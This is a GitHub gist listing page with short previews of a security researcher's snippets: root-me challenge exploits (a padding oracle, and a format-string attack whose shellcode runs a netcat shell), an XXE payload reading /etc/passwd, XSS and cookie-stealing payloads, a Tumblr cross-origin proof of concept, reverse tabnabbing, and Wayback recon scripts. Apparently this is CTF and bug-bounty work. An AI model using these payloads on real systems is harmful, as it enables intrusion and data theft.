thehackerish thehackerish
thehackerish
/ padding_oracle.py
Created
February 28, 2016 22:15
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| import socket, sys | |
| from time import sleep | |
| from binascii import hexlify | |
| HOST = 'challenge01.root-me.org' | |
| PORT = 51014 | |
| BLOCK_SIZE = 16 |
thehackerish
/ paoracle.py
Created
March 1, 2016 14:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from paddingoracle import BadPaddingException, PaddingOracle | |
| from base64 import b64encode, b64decode | |
| from urllib import quote, unquote | |
| import socket | |
| import time | |
| class PadBuster(PaddingOracle): | |
| def __init__(self, **kwargs): | |
| super(PadBuster, self).__init__(**kwargs) | |
| self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
thehackerish
/ e.py
Created
August 1, 2016 10:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket, struct, pipes, subprocess | |
| from time import sleep | |
| import sys, os | |
| HOST, PORT = ('challenge03.root-me.org', 2223) | |
| RET = 0x08049754 | |
| BUFFER_ADDR = 0x8049880 | |
| FMT_OFFSET = 145 | |
| SHELLCODE = '\x60\x31\xc0\x31\xd2\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x68\x2d\x63\x63\x63\x89\xe1\x52\xeb\x07\x51\x53\x89\xe1\xcd\x80\x61\xe8\xf4\xff\xff\xff\x6e\x63\x20\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x20\x34\x34\x34\x34\x20\x2d\x65\x20\x2f\x62\x69\x6e\x2f\x73\x68' |
thehackerish
/ rss.xml
Last active
May 12, 2017 10:41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="ISO-8859-1"?> | |
| <!DOCTYPE foo [ | |
| <!ENTITY xxe SYSTEM "file:///etc/passwd" > | |
| ]> | |
| <rss version="2.0"> | |
| <channel> | |
| <title>Mon site</title> | |
| <description>Ceci est un exemple de flux RSS 2.0</description> | |
| <lastBuildDate>Sat, 07 Sep 2002 00:00:01 GMT</lastBuildDate> |
thehackerish
/ waybackrobots.py
Created
July 6, 2017 13:54
— forked from mhmdiaa/waybackrobots.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import re | |
| import sys | |
| from multiprocessing.dummy import Pool | |
| def robots(host): | |
| r = requests.get( | |
| 'https://web.archive.org/cdx/search/cdx\ | |
| ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
thehackerish
/ waybackurls.py
Created
July 6, 2017 13:54
— forked from mhmdiaa/waybackurls.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import json | |
| def waybackurls(host, with_subs): | |
| if with_subs: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
| else: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
thehackerish
/ poc.js
Created
May 29, 2018 12:06
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var xhttp = new XMLHttpRequest(); | |
| xhttp.onreadystatechange = function() { | |
| if (this.readyState == 4 && this.status == 200) { | |
| // Typical action to be performed when the document is ready: | |
| alert(xhttp.responseText); | |
| } | |
| }; | |
| xhttp.open("POST", "https://www.tumblr.com/svc/secure_form_key", true); | |
| xhttp.send(); |
thehackerish
/ foo.html
Created
January 8, 2019 12:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script>alert(1)</script> |
thehackerish
/ swagger.json
Created
January 8, 2019 13:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "apiVersion": "1.0", | |
| "apis": [{ | |
| "description": "Please to click Terms of service", | |
| "termsOfServiceUrl": "javascript:alert(document.cookie)", | |
| "path": "\/def\/", | |
| "position": 0 | |
| }], | |
| "authorizations": {}, |
thehackerish
/ re.html
Created
July 2, 2019 13:54
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> opener.location="https://www.google.com"</script> |
OlderNewer